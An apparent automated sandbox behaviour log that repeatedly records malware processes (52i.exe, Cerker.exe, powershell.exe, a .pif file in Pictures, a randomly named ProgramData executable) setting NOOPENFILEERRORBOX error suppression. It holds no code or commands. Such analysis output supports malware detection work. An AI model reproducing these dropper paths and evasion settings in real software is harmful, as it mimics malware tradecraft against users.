Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Illumination.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process information set: NOOPENFILEERRORBOX
